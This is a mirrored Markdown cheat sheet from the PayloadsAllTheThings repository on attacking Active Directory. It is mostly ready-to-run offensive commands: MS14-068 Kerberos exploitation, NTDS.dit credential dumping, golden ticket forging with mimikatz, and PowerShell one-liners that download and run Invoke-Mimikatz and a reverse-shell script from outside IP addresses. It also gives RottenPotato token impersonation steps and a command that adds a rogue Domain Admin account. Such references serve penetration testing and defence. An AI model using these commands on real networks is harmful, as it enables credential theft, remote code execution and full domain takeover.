mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-12-20 03:16:10 +00:00
145 lines
5.0 KiB
Markdown
145 lines
5.0 KiB
Markdown
# Active Directory Attacks
|
||
|
||
## Most common paths to AD compromise
|
||
* MS14-068 (Microsoft Kerberos Checksum Validation Vulnerability)
|
||
```bash
|
||
Exploit Python: https://www.exploit-db.com/exploits/35474/
|
||
Doc: https://github.com/gentilkiwi/kekeo/wiki/ms14068
|
||
Metasploit: auxiliary/admin/kerberos/ms14_068_kerberos_checksum
|
||
|
||
git clone https://github.com/bidord/pykek
|
||
python ./ms14-068.py -u <userName>@<domainName> -s <userSid> -d <domainControlerAddr> -p <clearPassword>
|
||
python ./ms14-068.py -u darthsidious@lab.adsecurity.org -p TheEmperor99! -s S-1-5-21-1473643419-774954089-2222329127-1110 -d adsdc02.lab.adsecurity.org
|
||
mimikatz.exe "kerberos::ptc c:\temp\TGT_darthsidious@lab.adsecurity.org.ccache"
|
||
```
|
||
* MS17-010 (Eternal Blue - Local Admin)
|
||
```c
|
||
nmap -Pn -p445 — open — max-hostgroup 3 — script smb-vuln-ms17–010 <ip_netblock>
|
||
```
|
||
* Unconstrained Delegation (incl. pass-the-ticket)
|
||
* OverPass-the-Hash (Making the most of NTLM password hashes)
|
||
* Pivoting with Local Admin & Passwords in SYSVOL
|
||
```c
|
||
findstr /S /I cpassword \\<FQDN>\sysvol\<FQDN>\policies\*.xml
|
||
|
||
or
|
||
|
||
Metasploit: scanner/smb/smb_enumshares
|
||
Metasploit: windows/gather/enumshares
|
||
Metasploit: windows/gather/credentials/gpp
|
||
```
|
||
* Dangerous Built-in Groups Usage
|
||
* Dumping AD Domain Credentials
|
||
```c
|
||
C:\>ntdsutil
|
||
ntdsutil: activate instance ntds
|
||
ntdsutil: ifm
|
||
ifm: create full c:\pentest
|
||
ifm: quit
|
||
ntdsutil: quit
|
||
|
||
secretsdump.py -ntds ntds.dit -system SYSTEM LOCAL
|
||
|
||
or
|
||
|
||
Metasploit : windows/gather/credentials/domain_hashdump
|
||
```
|
||
* Golden Tickets
|
||
```c
|
||
Get info - Mimikatz
|
||
lsadump::dcsync /user:krbtgt
|
||
lsadump::lsa /inject /name:krbtgt
|
||
|
||
Get info - Meterpreter(kiwi)
|
||
dcsync_ntlm krbtgt
|
||
|
||
Forge a Golden ticket - Mimikatz
|
||
kerberos::golden /user:evil /domain:pentestlab.local /sid:S-1-5-21-3737340914-2019594255-2413685307 /krbtgt:d125e4f69c851529045ec95ca80fa37e /ticket:evil.tck /ptt
|
||
kerberos::tgt
|
||
|
||
Forge a Golden ticket - Metasploit
|
||
post/windows/escalate/golden_ticket
|
||
|
||
Forge a Golden ticket - Meterpreter
|
||
load kiwi
|
||
golden_ticket_create -d pentestlab.local -u pentestlabuser -s S-1-5-21-3737340914-2019594255-2413685307 -k d125e4f69c851529045ec95ca80fa37e -t /root/Downloads/pentestlabuser.tck
|
||
kerberos_ticket_use /root/Downloads/pentestlabuser.tck
|
||
```
|
||
* Kerberoast
|
||
```c
|
||
https://powersploit.readthedocs.io/en/latest/Recon/Invoke-Kerberoast/
|
||
https://room362.com/post/2016/kerberoast-pt1/
|
||
```
|
||
* Silver Tickets
|
||
* Trust Tickets
|
||
|
||
|
||
## Tools
|
||
* [Impacket](https://github.com/CoreSecurity/impacket)
|
||
* Responder
|
||
* Mimikatz
|
||
* [Ranger](https://github.com/funkandwagnalls/ranger)
|
||
* BloodHound
|
||
* RottenPotato
|
||
* [AdExplorer](https://docs.microsoft.com/en-us/sysinternals/downloads/adexplorer)
|
||
|
||
## Mimikatz
|
||
```
|
||
load mimikatz
|
||
mimikatz_command -f sekurlsa::logonPasswords full
|
||
```
|
||
|
||
## PowerSploit
|
||
```
|
||
https://github.com/PowerShellMafia/PowerSploit/tree/master/Recon
|
||
powershell.exe -nop -exec bypass -c “IEX (New-Object Net.WebClient).DownloadString('http://10.11.0.47/PowerUp.ps1'); Invoke-AllChecks”
|
||
powershell.exe -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://10.10.10.10/Invoke-Mimikatz.ps1');"
|
||
```
|
||
|
||
|
||
## PrivEsc - Token Impersonation (RottenPotato)
|
||
Binary available at : https://github.com/foxglovesec/RottenPotato
|
||
Binary available at : https://github.com/breenmachine/RottenPotatoNG
|
||
```c
|
||
getuid
|
||
getprivs
|
||
use incognito
|
||
list\_tokens -u
|
||
cd c:\temp\
|
||
execute -Hc -f ./rot.exe
|
||
impersonate\_token "NT AUTHORITY\SYSTEM"
|
||
```
|
||
|
||
```
|
||
Invoke-TokenManipulation -ImpersonateUser -Username "lab\domainadminuser"
|
||
Invoke-TokenManipulation -ImpersonateUser -Username "NT AUTHORITY\SYSTEM"
|
||
Get-Process wininit | Invoke-TokenManipulation -CreateProcess "Powershell.exe -nop -exec bypass -c \"IEX (New-Object Net.WebClient).DownloadString('http://10.7.253.6:82/Invoke-PowerShellTcp.ps1');\"};"
|
||
```
|
||
|
||
|
||
## PrivEsc - MS16-032 - Microsoft Windows 7 < 10 / 2008 < 2012 R2 (x86/x64)
|
||
```
|
||
Powershell:
|
||
https://www.exploit-db.com/exploits/39719/
|
||
https://github.com/FuzzySecurity/PowerShell-Suite/blob/master/Invoke-MS16-032.ps1
|
||
|
||
Binary exe : https://github.com/Meatballs1/ms16-032
|
||
|
||
Metasploit : exploit/windows/local/ms16_032_secondary_logon_handle_privesc
|
||
```
|
||
|
||
|
||
## Local Admin to Domain Admin
|
||
```
|
||
net user hacker2 hacker123 /add /Domain
|
||
net group "Domain Admins" hacker2 /add /domain
|
||
```
|
||
|
||
|
||
## Thanks to
|
||
* [https://chryzsh.gitbooks.io/darthsidious/content/compromising-ad.html](https://chryzsh.gitbooks.io/darthsidious/content/compromising-ad.html)
|
||
* [Top Five Ways I Got Domain Admin on Your Internal Network before Lunch (2018 Edition) - Adam Toscher](https://medium.com/@adam.toscher/top-five-ways-i-got-domain-admin-on-your-internal-network-before-lunch-2018-edition-82259ab73aaa)
|
||
* [Road to DC](https://steemit.com/infosec/@austinhudson/road-to-dc-part-1)
|
||
* [Finding Passwords in SYSVOL & Exploiting Group Policy Preferences](https://adsecurity.org/?p=2288)
|
||
* [Golden ticket](https://pentestlab.blog/2018/04/09/golden-ticket/)
|